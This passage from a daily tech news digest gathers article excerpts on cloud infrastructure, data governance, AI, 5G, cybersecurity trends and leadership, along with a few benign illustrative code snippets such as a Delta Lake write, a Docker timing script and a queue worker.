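            "org.apache.spark.sql.delta.catalog.DeltaCatalog")
    .getOrCreate()
)

# Land events as an ACID table on cheap storage.
events = spark.createDataFrame(
    [("u1", "click"), ("u1", "buy"), ("u2", "click")], ["user_id", "event"])
events.write.format("delta").mode("append").save("/tmp/lakehouse/events")

# The same table serves BI-style SQL and ML feature extraction.
spark.read.format("delta").load("/tmp/lakehouse/events") \
     .createOrReplaceTempView("events")
spark.sql("SELECT user_id, count(*) AS n FROM events GROUP BY user_id").show()
```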


A CISO’s guide to discussing cybersecurity with the board

When you get a chance to speak with executives, you typically don’t have much time to discuss details. And frankly, that’s not what executives are looking for, anyway. It’s important to phrase cybersecurity conversations in a way that resonates with the leaders. Messaging starts with understanding the C-suite and boards’ priorities. Usually, they are interested in big picture initiatives, so explain why cyber investment is critical to the success of these initiatives. For example, if the CEO wants to increase total revenue by 5% in the next year, explain how they can prevent major unnecessary losses from a cyber attack with an investment in cybersecurity. Once you know the executive team and board’s goals, look to specific members, and identify a potential ally. Has one team recently had a workplace security breach? Does one leader have a difficult time getting his or her team to understand the makings of a phishing scheme? These interests and experiences can help guide the explanation of the security solution. If you’re a CISO, you’re well-versed in cybersecurity, but remember that not everyone is as involved in the subject as you are, and business leaders probably will not understand technical jargon.


Best of 2021 – Containers vs. Bare Metal, VMs and Serverless for DevOps

A bare metal machine is a dedicated server using dedicated hardware. Data centers have many bare metal servers that are racked and stacked in clusters, all interconnected through switches and routers. Human and automated users of a data center access the machines through access servers, high-security firewalls and load balancers. The virtual machine introduced an operating system simulation layer between the bare metal server’s operating system and the application, so one bare metal server can support more than one application stack with a variety of operating systems. This provides a layer of abstraction that allows the servers in a data center to be software-configured and repurposed on demand. In this way, a virtual machine can be scaled horizontally, by configuring multiple parallel machines, or vertically, by configuring machines to allocate more power to a virtual machine. One of the problems with virtual machines is that the virtual operating system simulation layer is quite “thick,” and loading and configuring each VM typically takes considerable time. In a DevOps environment, changes occur frequently.
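To illustrate the startup-time difference in practice, here is a small sketch using the Docker SDK for Python to time a container cold start. It assumes a running local Docker daemon; comparable VM boot timing would require a hypervisor's own tooling.

```python
# Time a container start with the Docker SDK. Containers typically start
# in well under a second because they skip the guest-OS boot a VM performs.
# Requires a running Docker daemon and the "docker" Python package.
import time
import docker

client = docker.from_env()

start = time.perf_counter()
output = client.containers.run("alpine", ["echo", "ready"], remove=True)
elapsed = time.perf_counter() - start

print(output.decode().strip())  # "ready"
print(f"container ran in {elapsed:.2f}s (first run is slower: image pull)")
```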


Desktop High-Performance Computing

Many engineering teams rely on desktop products that only run on Microsoft Windows. Desktop engineering tools that perform tasks such as optical ray tracing, genome sequencing, or computational fluid dynamics often couple graphical user interfaces with complex algorithms that can take many hours to run on traditional workstations, even when powerful CPUs and large amounts of RAM are available. Until recently, there has been no convenient way to scale complex desktop computational engineering workloads seamlessly to the cloud. Fortunately, the advent of AWS Cloud Development Kit (CDK), AWS Elastic Container Service (ECS), and Docker finally make it easy to scale desktop engineering workloads written in C# and other languages to the cloud. ... The desktop component first builds and packages a Docker image that can perform the engineering workload (factor an integer). AWS CDK, executing on the desktop, deploys the Docker image to AWS and stands up cloud infrastructure consisting of input/output worker queues and a serverless ECS Fargate cluster.
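As a hedged sketch of the worker side of such a design (in Python rather than the article's C#, with placeholder queue URLs), a containerized task might loop like this: pull a factoring job from the input queue, compute, and report to the output queue.

```python
# Sketch of a queue-driven worker of the kind a Fargate task might run.
# Queue URLs are placeholders; the factoring job mirrors the article's example.
import json
import boto3

sqs = boto3.client("sqs")
IN_Q = "https://sqs.us-east-1.amazonaws.com/123456789012/work-input"    # placeholder
OUT_Q = "https://sqs.us-east-1.amazonaws.com/123456789012/work-output"  # placeholder

def trial_factor(n: int) -> list[int]:
    factors, d = [], 2
    while d * d <= n:
        while n % d == 0:
            factors.append(d)
            n //= d
        d += 1
    return factors + ([n] if n > 1 else [])

while True:
    resp = sqs.receive_message(QueueUrl=IN_Q, MaxNumberOfMessages=1,
                               WaitTimeSeconds=20)  # long poll
    for msg in resp.get("Messages", []):
        n = int(json.loads(msg["Body"])["n"])
        sqs.send_message(QueueUrl=OUT_Q,
                         MessageBody=json.dumps({"n": n, "factors": trial_factor(n)}))
        sqs.delete_message(QueueUrl=IN_Q, ReceiptHandle=msg["ReceiptHandle"])
```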


Micromanagement is not the answer

Neuroscience also reveals why micromanaging is counterproductive. Donna Volpitta, an expert in “brain-based mental health literacy,” explained to me that the two most fundamental needs of the human brain are security and autonomy, both of which are built on trust. Leaders who instill a sense of trust in their employees foster that sense of security and autonomy and, in turn, loyalty. When leaders micromanage their employees, they undermine that sense of trust, which tends to breed evasion behaviors in employees. It’s a natural brain response. “Our brains have two basic operating modes—short-term and long-term,” Volpitta says. “Short-term is about survival. It’s the freeze-flight-fight response or, as I call it, the ‘grasshopper’ brain that is jumping all over. Long-term thinking considers consequences [and] relationships, and is necessary for complex problem solving. It’s the ‘ant’ brain, slower and steadier.” She says micromanagement constantly triggers short-term, survival thinking detrimental to both social interactions and task completion.


Unblocking the bottlenecks: 2022 predictions for AI and computer vision

One of the key challenges of deep learning is the need for huge amounts of annotated data to train large neural networks. While this is the conventional way to train computer vision models, the latest generation of technology providers are taking an innovative approach that enables machine learning with comparatively less training data. This includes moving away from supervised learning to self-supervised and weakly supervised learning, where data availability is less of an issue. This approach, also known as few-shot learning, detects objects as well as new concepts with considerably less input data. In many cases the algorithm can be trained with as few as 20 images. ... Privacy remains a major concern in the AI sector. In most cases, a business must share its data assets with the AI provider via third-party servers or platforms when training computer vision models. Under such arrangements there is always the risk that the third party could be hacked or even exploit valuable metadata for its own projects. As a result, we’re seeing the rise of Privacy Enhancing Computation, which enables data to be shared between different ecosystems in order to create value, while maintaining data confidentiality.
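A minimal sketch of the few-shot idea, simplified from prototypical-network-style methods: embed a handful of labelled images with a frozen pretrained encoder and classify queries by their nearest class prototype. The classes and random stand-in tensors are invented for illustration.

```python
# Few-shot sketch: embed ~20 support images per novel class with a frozen
# pretrained encoder, then label queries by their nearest class prototype.
import torch
import torchvision

encoder = torchvision.models.resnet18(weights="IMAGENET1K_V1")
encoder.fc = torch.nn.Identity()   # expose the 512-d penultimate features
encoder.eval()

@torch.no_grad()
def embed(images: torch.Tensor) -> torch.Tensor:
    return torch.nn.functional.normalize(encoder(images), dim=1)

# Random tensors stand in for ~20 support images per class and 5 queries.
support = {c: torch.randn(20, 3, 224, 224) for c in ("hardhat", "no_hardhat")}
queries = torch.randn(5, 3, 224, 224)

labels = list(support)
prototypes = torch.nn.functional.normalize(
    torch.stack([embed(x).mean(dim=0) for x in support.values()]), dim=1)

similarity = embed(queries) @ prototypes.T   # cosine similarity to prototypes
for i, idx in enumerate(similarity.argmax(dim=1)):
    print(f"query {i} -> {labels[idx]}")
```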


How Automation Can Solve the Security Talent Shortage Puzzle

Supporting remote and hybrid work requires organizations to invest in and implement new technologies that facilitate needs such as remote access, secure file-sharing, real-time collaboration and videoconferencing. Businesses must also hire professionals to configure, implement and maintain these tools with an eye towards security – a primary concern here, as businesses of all sizes now live or die by the availability and integrity of their data. The increasing complexity of IT environments – many of which are now pressured to support bring-your-own-device (BYOD) policies – has only intensified the need for competent cybersecurity talent. It’s not surprising that the ongoing shortage of trained professionals makes it difficult for organizations to expand their business and adopt new technologies. Almost half a million cybersecurity jobs remain open in the U.S. alone, forcing businesses to compete aggressively to fill these roles. Yet, economic pressures make it particularly difficult for small- to mid-sized businesses (SMBs) to play this game. Most cannot hope to match the high salaries that large enterprises offer.


HIPAA Privacy and Security: At a Crossroads in 2022?

The likely expansion of OCR’s mission into protecting the confidentiality of SUD data comes as actions to enforce the HITECH Breach Notification and HIPAA Security Rule appear to be at a standstill. According to data compiled by OCR, in 2021 there were more than 660 breaches involving the unauthorized disclosure of unsecured PHI reported by HIPAA-covered entities and their business associates, compromising the health information of over 40 million people. A significant number of the breaches reported to OCR appear to show violations of the HIPAA standards due to late reporting and failure to adequately secure information systems or train workforce members on safeguarding PHI. In 2021, OCR announced settlements in two enforcement actions involving compliance with the HIPAA Security Rule standards. OCR has been mum on its approach to enforcement of the HIPAA breach and security rules. One explanation could be the impact of the 5th Circuit Court of Appeals decision overturning an enforcement action against the University of Texas MD Anderson Cancer Center.


Will we see GPT-3 moment for computer vision?

It is truly the age of large models, with each new model bigger and more advanced than the previous one. Take, for example, GPT-3: when it was introduced in 2020, it was the largest language model, with 175 billion parameters. Fast forward one year, and we already have the GLaM model, a trillion-weight model. Transformer models like GPT-3 and GLaM are transforming natural language processing. There are active conversations around these models making job roles like writers and even programmers obsolete. While these can be dismissed as speculation for now, one cannot deny that these large language models have truly transformed the field of NLP. Could this innovation be extended to other fields, like computer vision? Can we have a GPT-3 moment for computer vision? OpenAI recently released GLIDE, a text-to-image generator, in which the researchers applied guided diffusion to the problem of text-conditional image synthesis. For GLIDE, the researchers trained a 3.5 billion parameter diffusion model that uses a text encoder. Next, they compared CLIP (Contrastive Language-Image Pre-training) guidance and classifier-free guidance.


What is Legacy Modernization

To achieve a good level of agility, the systems supporting the organization also have to quickly react and adapt to the surrounding environment. Legacy systems place a constraint on agility since they are often difficult to change or provide inefficient support for business activities. This is not unusual: at the time of the system design there were perhaps technology constraints that no longer exist, or the system was designed for a particular way of working that is no longer relevant. Legacy Modernization changes or replaces legacy systems, making the organization more efficient and cost-effective. Not only can this optimize existing business processes, but it can open new business opportunities. Security is an important driver for Legacy Modernization. Cyber-attacks on organizations are common and become more sophisticated over time. The security of a system degrades over time, and legacy systems may no longer have the support or the technologies required to deter modern attack methods, making them an easy target for hackers. This represents a significant business risk to an organization.



Quote for the day:

"Leadership is particularly necessary to ensure ready acceptance of the unfamiliar and that which is contrary to tradition." -- Cyril Falls

Daily Tech Digest - January 02, 2022

Updating Data Governance: Set Up a Cohesive Plan First

Just because a company has a Data Governance framework it used with a mature technology project, like a data warehouse, does not mean it is sufficient for newer technology initiatives, like machine learning. New business requirements need to be considered, especially where system integration is necessary. For example, Data Quality must be good for all data sets, across the entire enterprise, before machine learning can be applied to a new venture. Danette McGilvray, President and Principal at Granite Falls Consulting, said, “The cold brutal reality is that the data is not good enough to support machine learning in practically every company.” This is only one of many business needs that crop up before succeeding at such an undertaking. Revisiting Data Governance prior to starting a new data project reduces exposure to mistakenly overlooking prerequisites, and moves toward a unified Data Management approach. Rethinking older Data Governance plans alone does not necessarily lead to a more coherent Data Governance. 


A Hands-On Guide to Outlier Detection with Alibi Detect

Data points that are unusually far from the rest of the observations in a dataset are known as outliers. They are primarily caused by data errors (measurement or experimental errors, data collection or processing errors, and so on) or by naturally singular behaviour that differs from the norm. For example, in medical applications, very few people have an upper blood pressure greater than 200, so if we keep such values in the dataset, our statistical analysis and modelling conclusions will be skewed; they can, for instance, distort the mean and standard deviation values. As a result, it’s critical to accurately detect and handle outliers, either by removing them or reducing them to a predefined value. Outlier detection is thus critical for identifying anomalies whose model predictions we can’t trust and shouldn’t use in production. The type of outlier detector that is appropriate for a given application is determined by the data’s modality and dimensionality, the availability of labelled normal and outlier data, and whether the detector is pre-trained (offline) or updated online.
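A minimal hands-on sketch with alibi-detect's isolation-forest detector, fitting on mostly normal data and inferring a threshold; the blood-pressure-like values are synthetic, and keyword names may differ slightly across library versions.

```python
# Sketch: flag outliers with alibi-detect's IForest detector.
# The synthetic data loosely mimics the blood-pressure example above.
import numpy as np
from alibi_detect.od import IForest

rng = np.random.default_rng(0)
normal = rng.normal(loc=120, scale=10, size=(1000, 1))   # typical readings
extremes = rng.normal(loc=210, scale=5, size=(10, 1))    # rare extreme values
X = np.vstack([normal, extremes])

od = IForest(threshold=None)                   # threshold inferred below
od.fit(normal)                                 # fit on (mostly) normal data
od.infer_threshold(normal, threshold_perc=99)  # top 1% scores count as outliers

preds = od.predict(X)
print(preds["data"]["is_outlier"].sum(), "points flagged as outliers")
```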


How a startup uses AI to put worker safety first

Computer vision has progressed from an experimental technology to one that can interpret patterns in images and classify them using machine learning algorithms at scale. Advances in deep learning and neural networks are enabling enterprises to expand their use of computer vision, improving worker safety in the process. Computer vision techniques that reduce worker injuries and improve in-plant safety are based on unsupervised machine learning algorithms that excel at identifying patterns and anomalies in images. Computer vision platforms, including Everguard’s SENTRI360, rely on convolutional neural networks to categorize images and industrial workflows at scale. The quality of the datasets used to train supervised and unsupervised machine learning algorithms determines their accuracy. Convolutional neural networks also require large amounts of data to improve their precision in predicting events, and they are fine-tuned through iterative cycles of machine learning models. Each iteration of a machine learning model extracts specific attributes of an image and, over time, classifies those attributes. 


'Work’ in 2022: What’s next?

Undoubtedly, this needs a complete overhaul of existing policies, but what we must not forget is that in an evolving environment nothing can be treated as constant. Therefore, swift revision of new policies is very important to match changing scenarios while maintaining people-centricity as the central thought. Knowing the employee pulse will be key to creating or revising policies, for which regular surveys, town halls, and leadership connects are extremely important. Employee safety and well-being will continue to hold top-of-mind space, and workplace culture transformation will lean towards empathy and flexibility, though organizations will need to solve the challenge of how much is too much. They will have to rally together to find the sweet spot between productivity and preserving employees’ work-life balance. ... If data is considered the new oil of the 21st century, ‘Trust’ will become its equivalent in the post-pandemic world, making the relationship between the employer and the employee go through a gradual transition where managing expectations on both ends will be essential.


Blockchain technology developments help elevate food safety protocols

Blockchain technologies, something we have been discussing for a few years, are closer than we think. Transparency, traceability, and sustainability are vital to everyone in the industry. The FDA has outlined four core elements in the New Era of Smarter Food Safety Blueprint, and the first of these elements is tech-enabled traceability. Traceability processes are critical to ensure all food items are traced and tracked throughout the supply chain. Traceability is essential for food safety as well as operational efficiency. With a solid traceability program, it is possible to locate a product at any stage of the food chain within the supply chain — literally from farm to table. For this technology to work well, it must be user-friendly and affordable to all — small businesses and large corporations alike. When it is available and widely used, it will minimize foodborne illness outbreaks and assist significantly with speeding up the process of finding the source if an outbreak does occur. Affordable digital technology connecting buyers with validated verified sellers is at the forefront. 


I followed my dreams and got demoted to software developer

I was just a UX person, not a coder. Surrounded by only the most freakishly good developers at Facebook (and then at Stack Overflow), I pushed whatever fantasies I had about coding professionally aside. During these few years in which I’ve been coding in earnest on the side, I also found myself regularly discouraged and confused by the sheer number of possible things that I could learn or do. I can’t count the number of quarter-finished games and barely-started projects I have in my private GitHub repos (actually, I can. It’s 15, and those are just the ones that made it there). Without much formal education in this field, I’d frequently get lost down documentation holes and find myself drowning in the 800 ways of maybe solving the problem that I had. Finally, I came to the conclusion that I needed more structure, and that I wouldn’t be able to get that structure in the hour of useful-brain-time I had after work each day. I started researching bootcamps and doing budget calculations and made plans to leave Stack Overflow. 


Quantum Computing In 2022: A Leap Into The Tremendous Future Ahead

The various quantum computing analyses and initiatives by big tech and other organizations are opening up an ocean of opportunities for CIOs and IT departments to apply the technology in real-world settings. Quantum computers are well suited to solving complex optimization problems and performing fast searches of unstructured data. As Prashanth Kaddi, Partner, Deloitte India, mentions, “it has the potential to bring disruptive change across areas, including discovery, medication research, distribution supply chains, traffic flow, energy optimization and many more.” Quantum computing also significantly reduces time to market, as well as helping to enhance customer delivery. For instance, a pharmaceutical company may significantly cut the time it takes to bring new medications to market. In finance, it could enable faster, more complex Monte Carlo simulations for use cases like trading, trajectory optimisation, market volatility, and price optimization strategies, and more.


New data-decoding approach could lead to faster, smaller digital tech

Just one trifling issue: Encoding or decoding data in antiferromagnets can be a bit like trying to write with a dried-up pen or decipher the scribblings of a toddler. "The difficulty—and it's a significant difficulty—is how to write and read information," said Tsymbal, George Holmes University Professor of physics and astronomy. The same antiferromagnetic property that acts as a pro in one context—the lack of a net magnetic field preventing data corruption—becomes a con when it comes to actually recording data, Tsymbal said. Writing a 1 or 0 in a ferromagnet is a simple matter of flipping its spin orientation, or magnetization, via another magnetic field. That's not possible in an antiferromagnet. And whereas reading the spin state of a ferromagnet is similarly straightforward, it's not easy distinguishing between the spin states of an antiferromagnet—up-down vs. down-up—because neither produces a net magnetization that would yield discernible differences in the flow of electrons. Together, those facts have impeded efforts to develop antiferromagnetic tunnel junctions with practical use in actual devices.


IoT & AI Applications in Fisheries Industry Can Bring Another Blue Revolution, Read How?

IoT devices and AI are helping fisheries optimize where and when they fish; sensors identify fish and catch size, and onboard cameras aid in sorting the catch. The data can also help the wild fishing industry cut expenses by providing insights on how to cut fuel usage and enhance fleet maintenance using AI-driven predictive maintenance. According to McKinsey, if large-scale fishing enterprises around the world adopt this concept, they may save $11 billion in annual operating costs. With feed accounting for a considerable share of operating costs, and both underfeeding and overfeeding having severe consequences for fish health and size as well as water quality, feeding optimization can result in significant savings and benefits. Many smart fish farms, such as eFishery, use feeders that rely on vibration and auditory cues to enable more accurate feeding. The use of technology in aquaculture management is also boosting efficiency and reducing manpower demands, which is a significant financial and safety benefit for remote marine farms.


Advanced Analytics: A Look Back at 2021 and What's Ahead for 2022

Companies want to become more advanced in analytics in order to compete more effectively. Yet they are struggling both to keep talent in house and to build new talent to perform more advanced analytics. In other words, organizations need to build literacy to utilize tools such as self-service BI, and they need to either retain or grow talent to move forward with data science. Data literacy was a priority in 2021 and it will continue to be in 2022. Data literacy involves how well users understand and can interact with data and analytics and communicate the results to achieve business goals. It includes understanding data elements, understanding the business, framing analytics, critical interpretation, and communication skills. As part of this, we expect to see more organizations building literacy enablement teams to help educate their people. We also expect modern analytics tools with more advanced and augmented features, such as natural language search and the ability to surface descriptive insights, to grow in popularity.
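To make "surfacing descriptive insights" concrete, here is a minimal Python sketch (a toy with invented sample data and wording, not any vendor's feature) that turns summary statistics into the kind of plain-language sentence augmented analytics tools generate.

```python
from statistics import mean

def describe_metric(name, values):
    """Emit a plain-language descriptive insight from a numeric series (toy)."""
    first_half = mean(values[: len(values) // 2])
    second_half = mean(values[len(values) // 2 :])
    change = (second_half - first_half) / first_half * 100
    direction = "up" if change >= 0 else "down"
    return (f"{name} averaged {mean(values):,.0f}, trending {direction} "
            f"{abs(change):.1f}% in the second half of the period.")

monthly_sales = [120, 135, 128, 150, 161, 158]  # invented sample data
print(describe_metric("Monthly sales", monthly_sales))
```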



Quote for the day:

"The best leader brings out the best in those he has stewardship over." -- J. Richard Clarke

Daily Tech Digest - January 01, 2022

The Future Role of the Chief Innovation Officer

One of the key ideas highlighted today is making your business resilient. As enterprises move forward in a post-pandemic period, organizational resiliency will be among the main goals, and innovation will be at the heart of becoming resilient. Chief innovation officers will help companies develop the ability to rapidly respond to unexpected events and the associated shift in customer needs. The key here is how to make your products and services flexible to cope with significant business disruptions. Most people think that developing innovative ideas is solely the role of the chief innovation officer. But this is not true. Chief innovation officers do not have a monopoly of knowledge when it comes to new ideas. In most instances, the role of chief innovation officers is to cultivate a company culture that allows other people within the organization to develop new ideas. They do that by training people to become innovative and helping create a work environment that encourages individuals to contribute new ideas for the company's benefit. 


Analytics and AI in 2022: Innovation in the era of COVID

From low-code, we move to what we might call "low-data." Dr. Jans Aasman, CEO of Franz Inc., characterized the new normal of personal data analytics: "in 2022 we will see new ways for users to regain control of their data." That's great, but it's yet another disruption, forcing companies to personalize experiences without access to as much personal data. Jennifer Krizanek, President, NA and CMO of Contentserv, describes the challenge: "2022 will witness businesses strategizing on how to personalize the customer experience without breaking GDPR laws or infringing on consumers' data privacy rights." She further opines that next year "will be the year in which businesses learn how to operate, market and personalize their offerings to consumers without tracking their every move." But how can that be done? For openers, Denodo's Shankar says that "in 2022, organizations will leverage small data analytics to create hyper personalized experiences for their individual customers to understand customer sentiment around a specific product or service within a short time window." 


What the Rise in Cyber-Recon Means for Your Security Strategy

Enterprises need to be aware that an increase in new cybercriminals armed with advanced technologies will increase the likelihood and volume of attacks. Standard tools must be able to scale to address potential increases in attack volumes. These tools also need to be enhanced with artificial intelligence (AI) to detect attack patterns and stop threats in real time. Critical tools should include anti-malware engines using AI detection signatures, endpoint detection and response (EDR), advanced intrusion prevention system (IPS) detection, sandbox solutions augmented with MITRE ATT&CK mappings and next-gen firewalls (NGFWs). In the best-case scenario, these tools are deployed consistently across the distributed network (data center, campus, branch, multi-cloud, home office, endpoint) using an integrated security platform that can detect, share, correlate and respond to threats as a unified solution. Cybercriminals are opportunistic, and they’re also growing increasingly crafty. We’re now seeing them spend more time on the reconnaissance side of cyberattacks.
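As a sketch of the kind of AI-assisted pattern detection described above (a toy z-score detector, not any product's engine), the following Python flags request volumes that deviate sharply from a trailing baseline:

```python
from statistics import mean, stdev

def flag_anomalies(counts, window=5, z_threshold=3.0):
    """Flag points whose z-score vs. the trailing window exceeds the threshold.
    A toy stand-in for ML-based attack-pattern detection."""
    alerts = []
    for i in range(window, len(counts)):
        baseline = counts[i - window : i]
        mu, sigma = mean(baseline), stdev(baseline)
        if sigma > 0 and (counts[i] - mu) / sigma > z_threshold:
            alerts.append((i, counts[i]))
    return alerts

# Requests per minute; the spike at the end mimics a scanning burst
traffic = [100, 104, 98, 101, 99, 103, 97, 102, 950]
print(flag_anomalies(traffic))  # -> [(8, 950)]
```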


Is Apple making the same mistakes made by Nokia?

The fall of Nokia and the rise of Apple as a smartphone giant are deeply intertwined. Apple, which throughout the global recession near-unfailingly smashed Wall Street forecasts, is beginning to lose its aura of invincibility. Apple took a $6 billion hit to its sales during the fiscal fourth quarter due to persistent global supply chain problems. The company has missed Wall Street targets twice in under a year. CEO Tim Cook may now have to worry more about economic and product launch cycles, and the whims of fickle consumers. The blockbuster smartphone that adds a special gloss to the Apple brand is a highly cyclical product. Buyers emerge in droves every time a new version is launched, lining up at stores overnight, and snarling supply for the device. Its popularity has heightened speculation around the device every year as over 100 million yearly customers decide when to switch to a new model, whether to buy now or hold out for a better but same-priced phone.


2021 Information security in memes and tweets

For those who don’t know: Cellebrite produces equipment for so-called competent authorities, allowing employees to easily and conveniently hack into smartphones and retrieve information of interest from them. That’s why the company holds a special place in the hearts of privacy advocates. In late 2020, Cellebrite announced that their products were beginning to support Signal. In response, the Signal team published a study of vulnerabilities in Cellebrite hardware and accompanied it with an unparalleled teaser ... Colonial Pipeline, the largest U.S. pipeline system that moves petroleum products, was attacked by ransomware, disrupting gasoline and diesel supplies across the southeast coast of the country. The incident sparked a lot of discussion about how these kinds of businesses should be protected, and the company’s own announcement of a search for a new cybersecurity manager went viral on social media as a meme, with the comment “They probably have a decent budget now.” 


Understanding 5G in India in 2022

5G is not radically different in principle from 4G: it builds on the same mobile network principles, but the 5G New Radio (NR) air interface enhances OFDM to deliver a much higher degree of scalability and flexibility. 5G also brings higher-bandwidth spectrum frequencies into play. Spectrum in the millimetre-wave and sub-6 GHz bands will be used for 5G services, marking the first time such high-frequency airwaves are used to roll out mobile network services. This makes 5G markedly different from 4G in its use cases and applications. The mobile ecosystem will reach new realms with 5G that weren't possible with previous-generation technologies. Compared with 4G networks, 5G is faster, has more capacity, delivers significantly lower latency, offers a more unified platform, and makes far better use of higher-frequency spectrum than 4G ever could. 5G is designed to support more mission-critical applications and communications, and to bring the massive Internet of Things (IoT) to the table.
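One reason mmWave spectrum behaves so differently is basic propagation physics. The Python sketch below uses the standard free-space path loss formula, FSPL(dB) = 20 log10(d_km) + 20 log10(f_MHz) + 32.44, to compare a sub-6 GHz carrier with a millimetre-wave one; the specific frequencies are illustrative choices, not a statement about any operator's allocation.

```python
import math

def fspl_db(distance_km, freq_mhz):
    """Free-space path loss in dB (distance in km, frequency in MHz)."""
    return 20 * math.log10(distance_km) + 20 * math.log10(freq_mhz) + 32.44

d = 0.5  # 500 m cell edge
for freq in (3_500, 28_000):  # 3.5 GHz (sub-6) vs 28 GHz (mmWave), illustrative
    print(f"{freq / 1000:.1f} GHz at {d * 1000:.0f} m: {fspl_db(d, freq):.1f} dB")
# mmWave loses ~18 dB more over the same distance (20*log10(28/3.5)),
# which is why 5G mmWave relies on dense small cells and beamforming.
```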


Predictions 2022: Edge tech, enterprise 5G, cybersecurity in focus

The Edge discussion will separate into two focus areas – edge platforms that provide a stable pool of secure capacity for the diverse edge ecosystems and software defined edge workloads/software stacks that extend application and data systems into real world environments. We are already seeing this shift today. As we move into 2022, we expect edge platforms to become more capable and pervasive. ... Edge will become the new battleground for data management as the latter becomes a new class of workload. Data management and the edge will increasingly converge and reinforce each other. The cybersecurity industry is now moving from discussion of emerging security concerns to a bias toward action. Enterprises and governments are facing threats of greater sophistication and impact on revenue and services. As a result, the cybersecurity industry is responding with greater automation and integration. The industry is also pivoting from automated detection to prevention and response with a focus on applying AI and machine learning to speed remediation.


Top 6 Trends Shaping Digital Transformation in 2022

More enterprises will also see a shift toward low-code or no-code software adoption. These tools have long been the source of some controversy in the IT industry because many developers have feared their jobs would become obsolete if companies could operate on low-code software alone. However, this category of tools has proven to be an asset to developers in recent years. “No-code tools are great to solve simpler problems,” says Dean Guida, CEO and founder of Infragistics. “When you combine low-code tools and professional developers you can tackle the higher impact digital solutions that will give competitive advantage to organizations.” Low-code and no-code software means developers can prioritize innovation and business growth rather than spending time building tools for day-to-day operations. But that’s not where the benefits stop. Low-code solutions also provide an opportunity for professionals in other parts of the organization to make smarter decisions without confronting a steep learning curve.


Mind-Controlled Robots A Step Closer To Realization

The two research groups developed a computer program that makes it possible to control a robot using thoughts alone; no voice control or touch is necessary. The system receives input from a person’s brain through a head cap equipped with electrodes that perform electroencephalogram (EEG) scans of the user’s brain signals. To use the robot arm, all the person has to do is look at it. The robot automatically understands when it has done something wrong, because the brain emits a signal that effectively tells it, “Not like that.” The system uses a combination of inverse reinforcement learning (IRL) techniques and brain-computer interfaces (BCI) that decode error-related potentials (ErrP), allowing the system to shape a reward function from the user’s ErrP. In other words, through trial and error, the robot figures out the user’s needs by interpreting their brain signals. According to the lead author, Iason Batzianoulis, what was particularly difficult from a technical viewpoint was “‘translating’ a patient’s brain signals into actions performed by the robot.” They did that by using machine learning to link each brain signal to specific tasks.
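A rough way to picture the ErrP-driven learning loop is a bandit-style agent that treats a decoded error potential as negative reward and its absence as positive reward. The Python sketch below is a hypothetical toy, not the researchers' code: the targets, decoder stand-in, and learning rates are all invented for illustration.

```python
import random

# Value estimates for three hypothetical reach targets the robot can choose
values = {"left": 0.0, "center": 0.0, "right": 0.0}
user_intent = "right"   # what the user actually wants (unknown to the robot)
alpha, epsilon = 0.3, 0.2

def decode_errp(action):
    """Stand-in for a BCI classifier: an ErrP fires when the robot errs."""
    return action != user_intent

for trial in range(50):
    # Epsilon-greedy choice over current value estimates
    if random.random() < epsilon:
        action = random.choice(list(values))
    else:
        action = max(values, key=values.get)
    reward = -1.0 if decode_errp(action) else +1.0  # ErrP => negative reward
    values[action] += alpha * (reward - values[action])

print(values)  # "right" should dominate after training
```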


An overview of 7 tech trends reshaping enterprise architecture

While edge computing isn’t necessarily a new technology, it’s still a fairly new computing practice, not yet having gained the traction that hybrid cloud has. Hybrid cloud allows you to keep leveraging your on-premises infrastructure and your choice of a combination of public and private cloud services. It also enables you to scale on-demand and take advantage of AI/ML capabilities to help parse data faster. If a cloud environment can use a hybrid model, then so can a microservices environment. Integrate the two, and you’ve got the power of your legacy systems without having to deal with the complex layers of those systems. How? Because a microservices architecture allows you to componentize the most beneficial parts of your application. Microservice architecture, often used in cloud-native integration solutions, has made it easier for teams to code more efficiently, debug, and deploy faster, slowly replacing the massive, inflexible legacy systems. When managed correctly, microservices allow developers to better understand the source code without slowing down development because code review, application build, and deployment are streamlined compared to monolithic applications.
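To ground the componentization idea, here is a minimal Python microservice sketch using only the standard library; the endpoint and payload are invented for illustration. The point is that each such single-responsibility component can be coded, reviewed, built, and deployed independently of the rest of the application, which is what streamlines the workflow compared to a monolith.

```python
# Minimal single-responsibility microservice: exposes one pricing endpoint.
import json
from http.server import BaseHTTPRequestHandler, HTTPServer

class PricingHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path.startswith("/price"):
            body = json.dumps({"sku": "demo-123", "price_usd": 19.99})  # invented payload
            self.send_response(200)
            self.send_header("Content-Type", "application/json")
            self.end_headers()
            self.wfile.write(body.encode())
        else:
            self.send_response(404)
            self.end_headers()

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), PricingHandler).serve_forever()
```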



Quote for the day:

"Leadership is absolutely about inspiring action, but it is also about guarding against mis-action." -- Simon Sinek